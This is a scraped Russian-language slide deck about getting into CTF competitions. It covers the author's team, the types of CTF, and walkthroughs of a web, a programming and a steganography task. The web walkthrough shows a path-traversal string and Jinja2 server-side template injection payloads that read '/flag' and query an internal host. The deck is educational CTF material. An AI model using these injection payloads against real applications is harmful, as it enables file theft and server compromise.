ݺߣ

ݺߣShare a Scribd company logo
Играем в CTF
- познаем мир
информационной безопасности
Кто я такой?
• Участник CTF команды b1n4ry4rms
и один из основателей команды hackerstan (об этой команде
ниже)
• Играю в CTF c августа 2016 года
• Работаю в Mad Devs, занимаюсь вебом.
• Больше 10 лет опыта в программировании
• Интересуюсь ИБ
В каких CTF поучаствовал?
Лаборатории, в которых участвовал:
V8 , V9, V10
lab.pentestit.r
u
Что такое CTF?
• Скорость
• Навыки и знания
• Командная работа
Playing CTF and Entering the World of Information Security / Играем в CTF познаем мир информационной безопасности
Playing CTF and Entering the World of Information Security / Играем в CTF познаем мир информационной безопасности
Ну и главная цель CTF :)
Результаты личного CTF hackyou.ctf.su
• 1400 очков 62 место из 374 участников и я
единственный из Кыргызстана :) участвовал
Достижения hackerstan 540 pts 406 место
hackerstan
А ты готов вступить в
ряды нашей команды?
https://goo.gl/SvZvqG
Playing CTF and Entering the World of Information Security / Играем в CTF познаем мир информационной безопасности
Виды CTF
• Jeopardy
• Командные
• Личные
• Attack-defence
• Командные
Погрузимся в мир CTF
Zumbo 3 (WEB)
Bsidessf CTF
Playing CTF and Entering the World of Information Security / Играем в CTF познаем мир информационной безопасности
Playing CTF and Entering the World of Information Security / Играем в CTF познаем мир информационной безопасности
Playing CTF and Entering the World of Information Security / Играем в CTF познаем мир информационной безопасности
<!-- page: index.template,
src: /code/server.py -->
Playing CTF and Entering the World of Information Security / Играем в CTF познаем мир информационной безопасности
flag1 = 'FLAG: FIRST_FLAG_WASNT_HARD'
with open('/flag') as f:
flag2 = f.read()
flag3 =
requests.get('http://vault:8080/flag').text
Playing CTF and Entering the World of Information Security / Играем в CTF познаем мир информационной безопасности
/..%2f../flag
template += "n<!-- page: %s, src: %s -->n" % (page, __file__)
return flask.render_template_string( template, name='test',
counter=counter);
SSTI - Server Side Template Injection ?
Как проверить?
Playing CTF and Entering the World of Information Security / Играем в CTF познаем мир информационной безопасности
{{''.__class__.__mro__[2].__subclasses__()}}
{{''.__class__.__mro__[2].__subclasses__().
__str__().split(‘, ’)[40]}}
{{''.__class__.__mro__[2].__subclasses__()[40]('/flag').read()}}
{{''.__class__.__mro__[2].__subclasses__().
__str__().split(‘, ’)[341]}}
{% with b=''.__class__.__mro__[2].
__subclasses__()[341]('vault:8080') %}
{{b.request('GET', '/flag')}}
{{b.getresponse().read()}}{% endwith %}
hackyou.ctf.su
Playing CTF and Entering the World of Information Security / Играем в CTF познаем мир информационной безопасности
root@kali:~/# echo -e
"ZDc3MTEyMDJmYmFiOGE2ZTc1YjY5ZmZmOGZiOWQ3OTM=" | base64
-d; echo ''
d7711202fbab8a6e75b69fff8fb9d793
root@kali:~/#
root@windows:~/ScrapyProjects# scrapy startproject hackyouctf
New Scrapy project 'hackyouctf', using template directory
'/usr/local/lib/python2.7/dist-packages/scrapy/templates/project', created in:
/root/ScrapyProjects/hackyouctf
You can start your first spider with:
cd hackyouctf
scrapy genspider example example.com
root@windows:~/ScrapyProjects/hackyouctf#
scrapy genspider ppc100 hackyou-captcha.ctf.su
Created spider 'ppc100' using template 'basic' in module:
Hackyouctf.spiders.ppc100
root@windows:~/ScrapyProjects/hackyouctf#
cd hackyouctf/spiders/
root@windows:~/ScrapyProjects/hackyouctf/hackyouctf/spiders#
ls
__init__.py __init__.pyc ppc100.py
root@windows:~/ScrapyProjects/hackyouctf/hackyouctf/spiders#
<code> ……... </code>
Scrapy Spider
root@windows:~/ScrapyProjects/hackyouctf#
scrapy crawl ppc100
Flag: <b>Kill_4ll_hum4ns_like_in_f1rst_hack_y0u_h2LExNo</b>
Playing CTF and Entering the World of Information Security / Играем в CTF познаем мир информационной безопасности
strings steg200_a086e0c.jpeg
JFIF
http://futureboy.us/
$3br
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
#3R
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
^Gko
NS?7W
@=Fx
5<in
wATu$db
3OM
Присутствует раздел стенографии
Выбор декодирования картинки
Загружаем картинку
http://futureboy.us/stegano/decode.pl
Вс3м сп4с160!

More Related Content

Playing CTF and Entering the World of Information Security / Играем в CTF познаем мир информационной безопасности